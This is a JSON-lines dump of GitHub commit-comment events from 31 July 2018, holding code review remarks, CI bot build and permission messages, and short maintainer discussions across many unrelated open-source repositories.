{"id":"8045354660","type":"CommitCommentEvent","actor":{"login":"mohabouje"},"repo":{"name":"mohabouje/WinToast"},"payload":{"comment":{"id":29907643,"position":null,"line":null,"path":null,"commit_id":"30d0c0725824617f3395b8e23a05743ea40a64e8","created_at":"2018-07-31T16:50:29Z","updated_at":"2018-07-31T16:50:29Z","author_association":"OWNER","body":"Hi,\n\nFeel free to add the description you like. I think you did already some\npull request in the past. Just update the description and I will merge it.\n\nI'm travelling with no access to my PC.\n\nHave a good day,\n\nBest regards\n\nOn Tue, 31 Jul 2018, 18:21 Christian Galla, <notifications@github.com>\nwrote:\n\n> Thank you for adding my tool to the readme.\n> Unfortunately, I am not quite satisfied with the headline because in my\n> opinion an extension is not a library (even if it is distributed as a dll\n> file).\n>\n> How about something like \"Software that uses WinToast\"?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mohabouje/WinToast/commit/30d0c0725824617f3395b8e23a05743ea40a64e8#commitcomment-29907136>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGhXmk09V-v0h3INsRlJPmokvHtOJv_vks5uMIQXgaJpZM4Volbl>\n> .\n>\n"}},"created_at":"2018-07-31T16:50:29Z"}
{"id":"8045360490","type":"CommitCommentEvent","actor":{"login":"mohabouje"},"repo":{"name":"mohabouje/WinToast"},"payload":{"comment":{"id":29907668,"position":null,"line":null,"path":null,"commit_id":"30d0c0725824617f3395b8e23a05743ea40a64e8","created_at":"2018-07-31T16:51:34Z","updated_at":"2018-07-31T16:51:34Z","author_association":"OWNER","body":"Some users contacted me about a binding for Python, and I did find a\nproject that already use the WinToasr library.\n\nThat's why I decide to put Libraries based on WinToast, or something like\nthat.\n\nWe can create two different list, like many projects. I did find that\nseveral projects on GitHub use WinToast. It may be a suitable opportunity\nto link all of them on a list based on software that use the library.\n\nBest regards\n\nOn Tue, 31 Jul 2018, 18:48 Mohammed Boujemaoui, <mohabouje@gmail.com> wrote:\n\n> Hi,\n>\n> Feel free to add the description you like. I think you did already some\n> pull request in the past. Just update the description and I will merge it.\n>\n> I'm travelling with no access to my PC.\n>\n> Have a good day,\n>\n> Best regards\n>\n> On Tue, 31 Jul 2018, 18:21 Christian Galla, <notifications@github.com>\n> wrote:\n>\n>> Thank you for adding my tool to the readme.\n>> Unfortunately, I am not quite satisfied with the headline because in my\n>> opinion an extension is not a library (even if it is distributed as a dll\n>> file).\n>>\n>> How about something like \"Software that uses WinToast\"?\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/mohabouje/WinToast/commit/30d0c0725824617f3395b8e23a05743ea40a64e8#commitcomment-29907136>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AGhXmk09V-v0h3INsRlJPmokvHtOJv_vks5uMIQXgaJpZM4Volbl>\n>> .\n>>\n>\n"}},"created_at":"2018-07-31T16:51:34Z"}
{"id":"8045361401","type":"CommitCommentEvent","actor":{"login":"rikkipitt"},"repo":{"name":"thoughtbot/parity"},"payload":{"comment":{"id":29907675,"position":null,"line":null,"path":null,"commit_id":"4f6390569b71bf7d3ae221cd91bef7fc7f09b6b9","created_at":"2018-07-31T16:51:43Z","updated_at":"2018-07-31T16:51:43Z","author_association":"CONTRIBUTOR","body":"@geoffharcourt Could you possibly release this in a new version please? Is everyone happy with the feature your side? Would be very helpful on a project I'm currently working on.\r\n\r\nCheers!"}},"created_at":"2018-07-31T16:51:43Z"}
{"id":"8045369422","type":"CommitCommentEvent","actor":{"login":"haberc"},"repo":{"name":"flowin-ibm/hotspots-backend"},"payload":{"comment":{"id":29907700,"position":null,"line":null,"path":null,"commit_id":"75bf1876f37a76a9e5d33d547a4e681dbd7cd67a","created_at":"2018-07-31T16:53:13Z","updated_at":"2018-07-31T16:53:13Z","author_association":"CONTRIBUTOR","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c489deb1-3263-4fad-8af1-5945532d805d?env_id=ibm%3Ayp%3Aeu-gb \"hotspots-backend-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/530d20a1-d99c-4d31-a7cd-007e905ce9a8?env_id=ibm%3Ayp%3Aeu-gb \"hotspots-backend-toolchain\") deployed [hotspots-backend](https://github.com/flowin-ibm/hotspots-backend/releases/tag/deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180731-165311 \"deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180731-165311\") to [dev](https://console.bluemix.net/apps/8a245273-5b00-449d-9057-9072c39701df?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:flood.prevention.bb@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-31T16:53:13Z"}
{"id":"8045372011","type":"CommitCommentEvent","actor":{"login":"steven-johnson"},"repo":{"name":"halide/Halide"},"payload":{"comment":{"id":29907713,"position":null,"line":null,"path":null,"commit_id":"ffb81962c3acb5484ed3addf6b71e3f481c0adc7","created_at":"2018-07-31T16:53:42Z","updated_at":"2018-07-31T16:53:42Z","author_association":"CONTRIBUTOR","body":"Is this change likely to improve performance?"}},"created_at":"2018-07-31T16:53:42Z"}
{"id":"8045372475","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29907716,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-31T16:53:47Z","updated_at":"2018-07-31T16:53:47Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 159](https://teamcity.otenv.com/viewLog.html?buildId=9041623&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-31T16:53:47Z"}
{"id":"8045378761","type":"CommitCommentEvent","actor":{"login":"acvizi"},"repo":{"name":"hurngchunlee/torque"},"payload":{"comment":{"id":29907730,"position":null,"line":null,"path":null,"commit_id":"e6200fe091e5ac1f00fb0af82a089b56c63fc041","created_at":"2018-07-31T16:54:55Z","updated_at":"2018-07-31T16:54:55Z","author_association":"NONE","body":"Good change. We have integrated it into 6.1.3 (and future versions) separate from this pull request so will plan to close it."}},"created_at":"2018-07-31T16:54:55Z"}
{"id":"8045379300","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29907733,"position":13,"line":179,"path":"test/specs/test_admin_route.js","commit_id":"789a91d7fcdf3eabe7a6db038c97e450542ada96","created_at":"2018-07-31T16:55:02Z","updated_at":"2018-07-31T16:55:02Z","author_association":"COLLABORATOR","body":"Since you have moved the functions out of the route and into the `admin_helper.js` file you may want to consider writing your tests for `admin_helper` your `admin` route doesn't really have any logic in it that needs testing."}},"created_at":"2018-07-31T16:55:02Z"}
{"id":"8045379613","type":"CommitCommentEvent","actor":{"login":"xeioex"},"repo":{"name":"nginx/njs"},"payload":{"comment":{"id":29907736,"position":7,"line":1261,"path":"nginx/ngx_http_js_module.c","commit_id":"6cea6c6f1b5f7a36cf92a9aff9f68f658bd566cd","created_at":"2018-07-31T16:55:06Z","updated_at":"2018-07-31T16:55:06Z","author_association":"CONTRIBUTOR","body":"@drsm thank you for catching.\r\n\r\nyes, it is a typo. Fortunately, numerical values for NXT_ERROR and NJS_ERROR are the same."}},"created_at":"2018-07-31T16:55:06Z"}
{"id":"8045379656","type":"CommitCommentEvent","actor":{"login":"naturalben"},"repo":{"name":"OminiraProtoco/OEN-Token"},"payload":{"comment":{"id":29907737,"position":null,"line":null,"path":null,"commit_id":"60c0a40844b629109c0add3397309658059e11e3","created_at":"2018-07-31T16:55:07Z","updated_at":"2018-07-31T16:55:07Z","author_association":"NONE","body":"Yeah I think there should be a bonus function added to it"}},"created_at":"2018-07-31T16:55:07Z"}
{"id":"8045382181","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29907747,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-31T16:55:35Z","updated_at":"2018-07-31T16:55:35Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 159](https://teamcity.otenv.com/viewLog.html?buildId=9041623&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:01:45"}},"created_at":"2018-07-31T16:55:35Z"}
{"id":"8045384230","type":"CommitCommentEvent","actor":{"login":"kevinpapst"},"repo":{"name":"kevinpapst/kimai2"},"payload":{"comment":{"id":29907753,"position":null,"line":null,"path":null,"commit_id":"8b8583d48b60693ad090b55f300c739f3aa13112","created_at":"2018-07-31T16:55:58Z","updated_at":"2018-07-31T16:55:58Z","author_association":"OWNER","body":"This commit was an accident, thanks to the \"Resolve conflicts\" view in PRs."}},"created_at":"2018-07-31T16:55:58Z"}
{"id":"8045384386","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"micjamking/tim-stafford-tattoos"},"payload":{"comment":{"id":29907754,"position":null,"line":null,"path":null,"commit_id":"adf427cf61f57b722a8065f5979079d7908b7fd2","created_at":"2018-07-31T16:56:00Z","updated_at":"2018-07-31T16:56:00Z","author_association":"NONE","body":"adf427c"}},"created_at":"2018-07-31T16:56:00Z"}
{"id":"8045391083","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"marco-c/mozilla-releng-services"},"payload":{"comment":{"id":29907783,"position":null,"line":null,"path":null,"commit_id":"b0c25bca774ae01bd037321d6226f9ffa6686763","created_at":"2018-07-31T16:57:15Z","updated_at":"2018-07-31T16:57:15Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1533056235544\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.b0c25bca774ae01bd037321d6226f9ffa6686763\",\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/marco-c/mozilla-releng-services:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1533056235544\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.b0c25bca774ae01bd037321d6226f9ffa6686763\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-31T16:57:15.586Z\n\n</details>"}},"created_at":"2018-07-31T16:57:15Z"}
{"id":"8045394947","type":"CommitCommentEvent","actor":{"login":"KBarbe"},"repo":{"name":"KBarbe/AutomationTesting"},"payload":{"comment":{"id":29907797,"position":null,"line":null,"path":null,"commit_id":"0519fc5d270f868624dcb7af9304bdef37c2e014","created_at":"2018-07-31T16:57:58Z","updated_at":"2018-07-31T16:57:58Z","author_association":"OWNER","body":"Realized too late that I was on my personal Git account instead of my professional/resume Git account when coding these.  The commits from Teimoli are also by KBarbe."}},"created_at":"2018-07-31T16:57:58Z"}
{"id":"8045395933","type":"CommitCommentEvent","actor":{"login":"malayamak"},"repo":{"name":"malayamak/Pl_sql_project"},"payload":{"comment":{"id":29907804,"position":null,"line":null,"path":null,"commit_id":"1a01a8a6179339077488a6773ad20535a77de7fe","created_at":"2018-07-31T16:58:10Z","updated_at":"2018-07-31T16:58:10Z","author_association":"OWNER","body":"Pierian-Data/Complete-Python-3-Bootcamp"}},"created_at":"2018-07-31T16:58:10Z"}
{"id":"8045400520","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29907812,"position":23,"line":43,"path":"models/admin_helper.js","commit_id":"789a91d7fcdf3eabe7a6db038c97e450542ada96","created_at":"2018-07-31T16:59:02Z","updated_at":"2018-07-31T16:59:02Z","author_association":"COLLABORATOR","body":"Again, please read the JavaScript documentation concerning the uses of `let` vs `const` and let me know if you have any questions around this."}},"created_at":"2018-07-31T16:59:02Z"}
{"id":"8045400773","type":"CommitCommentEvent","actor":{"login":"rejas"},"repo":{"name":"klei/gulp-inject"},"payload":{"comment":{"id":29907813,"position":null,"line":null,"path":null,"commit_id":"831d4b08a94a97aedb0e55a726dd03c3dffb70e9","created_at":"2018-07-31T16:59:05Z","updated_at":"2018-07-31T16:59:05Z","author_association":"CONTRIBUTOR","body":"I would glady accept any PR to make this feature opt-out and get your progress back on track. COuld you make one for this or do you need help?"}},"created_at":"2018-07-31T16:59:05Z"}
{"id":"8045406123","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":29907823,"position":4,"line":10,"path":"Frameworks/OakFileBrowser/src/OakFileBrowser.mm","commit_id":"dfa5bd779e9fb8a9daa2376844d93e735c2f9018","created_at":"2018-07-31T17:00:03Z","updated_at":"2018-07-31T17:00:03Z","author_association":"MEMBER","body":"Fixed with 9240fd008df15a3637d544dcde7af0fd5c0aa4c6, thanks!"}},"created_at":"2018-07-31T17:00:03Z"}
{"id":"8045408578","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29907839,"position":null,"line":null,"path":null,"commit_id":"fa52e21fce7b822d9c40db52e1fdb98095fb197a","created_at":"2018-07-31T17:00:28Z","updated_at":"2018-07-31T17:00:28Z","author_association":"MEMBER","body":"wait what？？？？？ u includes two correct commit... gosh..."}},"created_at":"2018-07-31T17:00:28Z"}
{"id":"8045410294","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29907847,"position":8,"line":8,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T17:00:48Z","updated_at":"2018-07-31T17:00:48Z","author_association":"NONE","body":"Stuff under .config needs a namespacing dir"}},"created_at":"2018-07-31T17:00:48Z"}
{"id":"8045411921","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29907849,"position":9,"line":9,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T17:01:06Z","updated_at":"2018-07-31T17:01:06Z","author_association":"NONE","body":"I don't see why we want this in addition to the .config/... one"}},"created_at":"2018-07-31T17:01:06Z"}
{"id":"8045412020","type":"CommitCommentEvent","actor":{"login":"AllKinds"},"repo":{"name":"dannykh/Hebrew-root-extraction"},"payload":{"comment":{"id":29907850,"position":null,"line":null,"path":null,"commit_id":"eddcff23cdbd64564817a5951a54b0d986ae861b","created_at":"2018-07-31T17:01:07Z","updated_at":"2018-07-31T17:01:07Z","author_association":"COLLABORATOR","body":"Seems like it didn't work, because I still see the .idea files"}},"created_at":"2018-07-31T17:01:07Z"}
{"id":"8045413344","type":"CommitCommentEvent","actor":{"login":"powerful23"},"repo":{"name":"aws-amplify/amplify-js"},"payload":{"comment":{"id":29907861,"position":null,"line":null,"path":null,"commit_id":"a3f91f60d1c8efcadb9818f346330e22c87570b9","created_at":"2018-07-31T17:01:23Z","updated_at":"2018-07-31T17:01:23Z","author_association":"CONTRIBUTOR","body":"@andrew-aladev I am really sorry about it. Will revert this change."}},"created_at":"2018-07-31T17:01:23Z"}
{"id":"8045413492","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29907863,"position":10,"line":10,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T17:01:25Z","updated_at":"2018-07-31T17:01:25Z","author_association":"NONE","body":"I'd prefer to have a namespace dir here as well"}},"created_at":"2018-07-31T17:01:25Z"}
{"id":"8045413888","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"mkahn602/fluffy-disco"},"payload":{"comment":{"id":29907867,"position":null,"line":null,"path":null,"commit_id":"7b2ab91a16b26be731938af1b0b43a88c047b135","created_at":"2018-07-31T17:01:29Z","updated_at":"2018-07-31T17:01:29Z","author_association":"NONE","body":"Kicloud111@gmail.com"}},"created_at":"2018-07-31T17:01:29Z"}
{"id":"8045415633","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29907875,"position":18,"line":93,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"51d6935e64c5aa61201dd4a79fbb10ff0db2f810","created_at":"2018-07-31T17:01:50Z","updated_at":"2018-07-31T17:01:50Z","author_association":"NONE","body":"I'd like to see the `if editor.somethingSelected()` check done here instead of in `@getCodeUsage()`, and then only call `@setCodeUsage()` if it is true (otherwise, set `usageVisibility` to false).  Then you can remove the `if codeUsage is undefined` check from `@setCodeUsage()` as well."}},"created_at":"2018-07-31T17:01:50Z"}
{"id":"8045415717","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29907876,"position":20,"line":40,"path":"models/admin_helper.js","commit_id":"789a91d7fcdf3eabe7a6db038c97e450542ada96","created_at":"2018-07-31T17:01:51Z","updated_at":"2018-07-31T17:01:51Z","author_association":"COLLABORATOR","body":"The `totalImages` array and this loop are unnecessary.  Can't you use user.images directly in your query?"}},"created_at":"2018-07-31T17:01:51Z"}
{"id":"8045415974","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioSingleCell"},"payload":{"comment":{"id":29907877,"position":null,"line":null,"path":null,"commit_id":"d90e7a1dde13cdea7073fe35491fdba357744ba8","created_at":"2018-07-31T17:01:54Z","updated_at":"2018-07-31T17:01:54Z","author_association":"NONE","body":"[R/zinbwave-internal.R:4:5:](https://github.com/hbc/bcbioSingleCell/blob/d90e7a1dde13cdea7073fe35491fdba357744ba8/R/zinbwave-internal.R#L4) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Y,\n    ^\n```\n[R/zinbwave-internal.R:5:5:](https://github.com/hbc/bcbioSingleCell/blob/d90e7a1dde13cdea7073fe35491fdba357744ba8/R/zinbwave-internal.R#L5) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    BPPARAM = BiocParallel::SerialParam(),\n    ^~~~~~~\n```\n[R/zinbwave-internal.R:11:5:](https://github.com/hbc/bcbioSingleCell/blob/d90e7a1dde13cdea7073fe35491fdba357744ba8/R/zinbwave-internal.R#L11) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Y <- as(Y, \"SingleCellExperiment\")\n    ^\n```"}},"created_at":"2018-07-31T17:01:54Z"}
{"id":"8045416303","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29907879,"position":11,"line":11,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T17:01:58Z","updated_at":"2018-07-31T17:01:58Z","author_association":"NONE","body":"I don't think this is typically done"}},"created_at":"2018-07-31T17:01:58Z"}
{"id":"8045418753","type":"CommitCommentEvent","actor":{"login":"jonasnick"},"repo":{"name":"apoelstra/secp256k1"},"payload":{"comment":{"id":29907888,"position":277,"line":224,"path":"src/modules/musig/musig.md","commit_id":"3f1ce6c47c15ebc953e6ac9248bb1464744131e6","created_at":"2018-07-31T17:02:24Z","updated_at":"2018-07-31T17:02:24Z","author_association":"NONE","body":"shouldn't that be z_j instead of x_j? same in the equation below"}},"created_at":"2018-07-31T17:02:24Z"}
{"id":"8045419101","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29907893,"position":47,"line":122,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"51d6935e64c5aa61201dd4a79fbb10ff0db2f810","created_at":"2018-07-31T17:02:28Z","updated_at":"2018-07-31T17:02:28Z","author_association":"NONE","body":"You don't need to add the `'px'` here for `usageTop` and `usageLeft`, you can do that in the template below."}},"created_at":"2018-07-31T17:02:28Z"}
{"id":"8045419143","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29907895,"position":null,"line":null,"path":null,"commit_id":"730ac94eda1a32c89c1534db8cb4255b818da9b0","created_at":"2018-07-31T17:02:28Z","updated_at":"2018-07-31T17:02:28Z","author_association":"MEMBER","body":"@drons Actually 730ac94 broke stuff. https://github.com/OSGeo/gdal/commit/4e52ab3df17dd85d1215cc6a2ab77c494b6b0bde should be safer. I let you do a more appropriate fix if needed"}},"created_at":"2018-07-31T17:02:28Z"}
{"id":"8045420671","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29907898,"position":20,"line":20,"path":"src/login/app.js","commit_id":"fc7cd03d3cdec3b1700a8ea8e0d92447321a9abb","created_at":"2018-07-31T17:02:46Z","updated_at":"2018-07-31T17:02:46Z","author_association":"MEMBER","body":"good, but u seems to forgot to bind the commit function to the login button via onclick event listener"}},"created_at":"2018-07-31T17:02:46Z"}
{"id":"8045421339","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29907902,"position":79,"line":182,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"51d6935e64c5aa61201dd4a79fbb10ff0db2f810","created_at":"2018-07-31T17:02:54Z","updated_at":"2018-07-31T17:02:54Z","author_association":"NONE","body":"Let's remove the `<hr>` for now - I don't think it'd match well with the rest of our menus."}},"created_at":"2018-07-31T17:02:54Z"}
{"id":"8045422428","type":"CommitCommentEvent","actor":{"login":"milesckt"},"repo":{"name":"milesckt/mgear"},"payload":{"comment":{"id":29907907,"position":null,"line":null,"path":null,"commit_id":"9d7d08791ac0293889ee7ddad9319d6145982c42","created_at":"2018-07-31T17:03:07Z","updated_at":"2018-07-31T17:03:07Z","author_association":"OWNER","body":"will update all 3 spline component"}},"created_at":"2018-07-31T17:03:07Z"}
{"id":"8045422585","type":"CommitCommentEvent","actor":{"login":"apoelstra"},"repo":{"name":"apoelstra/secp256k1"},"payload":{"comment":{"id":29907909,"position":277,"line":224,"path":"src/modules/musig/musig.md","commit_id":"3f1ce6c47c15ebc953e6ac9248bb1464744131e6","created_at":"2018-07-31T17:03:10Z","updated_at":"2018-07-31T17:03:10Z","author_association":"OWNER","body":"Yep, will fix"}},"created_at":"2018-07-31T17:03:10Z"}
{"id":"8045426312","type":"CommitCommentEvent","actor":{"login":"ssorj"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29907925,"position":16,"line":16,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T17:03:52Z","updated_at":"2018-07-31T17:03:52Z","author_association":"NONE","body":"If we end up wanting this to be generic beyond AMQP, we should consider an enable_tls option instead of scheme."}},"created_at":"2018-07-31T17:03:52Z"}
{"id":"8045428786","type":"CommitCommentEvent","actor":{"login":"milesckt"},"repo":{"name":"milesckt/mgear"},"payload":{"comment":{"id":29907931,"position":null,"line":null,"path":null,"commit_id":"62105dcf403cab1fc5931df589dc2260bc2f5276","created_at":"2018-07-31T17:04:19Z","updated_at":"2018-07-31T17:04:19Z","author_association":"OWNER","body":"small change at Foot bk component"}},"created_at":"2018-07-31T17:04:19Z"}
{"id":"8045429179","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29907932,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-31T17:04:24Z","updated_at":"2018-07-31T17:04:24Z","author_association":"NONE","body":"I think I had TextureUpscaling on but not 100% sure.\r\nRight now I can only propose a work-around:\r\n```\r\ndiff --git a/core/rend/TexCache.cpp b/core/rend/TexCache.cpp\r\nindex 0602871a..bcd2d2cc 100644\r\n--- a/core/rend/TexCache.cpp\r\n+++ b/core/rend/TexCache.cpp\r\n@@ -17,7 +17,7 @@ u32 palette16_ram[1024];\r\n u32 palette32_ram[1024];\r\n\r\n #ifdef HAVE_TEXUPSCALE\r\n-ctpl::thread_pool ThreadPool;\r\n+ctpl::thread_pool ThreadPool(1);\r\n #endif\r\n\r\n u32 detwiddle[2][8][1024];\r\n@@ -352,8 +352,9 @@ static void deposterizeV(u32* data, u32* out, int w, int h, int l, int u) {\r\n\r\n void parallelize(const std::function<void(int,int)> &func, int start, int end, int width /* = 0 */)\r\n {\r\n-       if (ThreadPool.size() == 0)\r\n-               ThreadPool.resize(max(1, (int)settings.pvr.MaxThreads));\r\n+       int max_threads = max(1, (int)settings.pvr.MaxThreads);\r\n+       if (ThreadPool.size() != max_threads)\r\n+               ThreadPool.resize(max_threads);\r\n\r\n        static const int CHUNK = 8;     // 32x32 best if not parall'ed (chunk >= 32)\r\n                                                                        //                       8: 0.0481391 ms\r\n\r\n```\r\n\r\nCan you try this on your end?"}},"created_at":"2018-07-31T17:04:24Z"}
{"id":"8045429193","type":"CommitCommentEvent","actor":{"login":"mikz"},"repo":{"name":"3scale/3scale_toolbox"},"payload":{"comment":{"id":29907933,"position":49,"line":49,"path":"spec/spec_helper.rb","commit_id":"c48b85359d0ba3710784a4d00ff6efde23cefdd9","created_at":"2018-07-31T17:04:24Z","updated_at":"2018-07-31T17:04:24Z","author_association":"MEMBER","body":"Would be great if we can enable those.\r\n\r\nUsually `warnings` is pretty hard especially when using 3rd party libraries. But they all enforce good testing hygiene. "}},"created_at":"2018-07-31T17:04:24Z"}
{"id":"8045429741","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907936,"position":null,"line":null,"path":null,"commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T17:04:31Z","updated_at":"2018-07-31T17:04:31Z","author_association":"NONE","body":"Ну не знаю... пользоваться этим будет невозможно. Я понимаю, что это только заготовка, но все же. ИМХО. В этом классе не нужны методы `getLessonName`, `getLessonDescription`, `getDayScheduleDate`. Слишком простая структура данных чтобы для этого заводить отдельные методы, достаточно получения всей недели и отдельного дня.\r\n\r\nПусть лучше будет метод `getWeekSchedule(startWeekDay)`, который будет делать запрос по адресу http://ruz2.spbstu.ru/api/v1/ruz/scheduler/24118?date=startWeekDay и возвращать list с расписанием по дням, который потом уже можно распарсить самому.\r\n<img width=\"386\" alt=\"2018-07-31 19 51 02\" src=\"https://user-images.githubusercontent.com/28672259/43474301-24809122-94fb-11e8-90c5-898374eeb078.png\">\r\n\r\nИ отдельный метод `getDayShedule(startWeekDay, dayNumber)`, который будет получать расписание через `getWeekSchedule`, выбирать нужный день и возвращать его.\r\n\r\n```py\r\ndaySchedule = getDayShedule(startWeekDay, day)\r\n\r\ndate = daySchedule['date']\r\nlessons = daySchedule['lessons']\r\n```"}},"created_at":"2018-07-31T17:04:31Z"}
{"id":"8045429743","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29907937,"position":36,"line":17,"path":"src/login/index.html","commit_id":"fc7cd03d3cdec3b1700a8ea8e0d92447321a9abb","created_at":"2018-07-31T17:04:31Z","updated_at":"2018-07-31T17:04:31Z","author_association":"MEMBER","body":"extra ')' character.... have u even checked this thing before commit...？"}},"created_at":"2018-07-31T17:04:31Z"}
